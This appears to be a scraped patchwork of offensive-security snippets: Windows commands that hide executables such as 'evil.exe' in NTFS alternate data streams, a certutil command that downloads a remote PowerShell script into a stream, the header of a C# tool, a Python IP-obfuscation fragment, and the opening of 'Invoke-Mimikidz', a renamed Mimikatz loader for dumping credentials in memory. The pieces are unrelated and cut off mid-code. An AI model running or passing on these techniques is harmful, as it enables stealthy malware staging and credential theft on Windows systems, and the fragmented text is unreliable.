type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
| /* | |
| Author: Arno0x0x, Twitter: @Arno0x0x | |
| ===================================== COMPILING ===================================== | |
| C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:detected.exe detected.cs | |
| */ | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; |
| import sys | |
| def to_octets(ip): | |
| return [int(i) for i in ip.split('.')] | |
| def dotless_decimal(ip): | |
| octets = to_octets(ip) | |
| result = octets[0] * 16777216 + octets[1] * \ |
| function Invoke-Mimikidz | |
| { | |
| <# | |
| .SYNOPSIS | |
| This script leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as | |
| dump credentials without ever writing the mimikatz binary to disk. | |
| The script has a ComputerName parameter which allows it to be executed against multiple computers. | |
| This script should be able to dump credentials from any version of Windows through Windows 8.1 that has PowerShell v2 or higher installed. |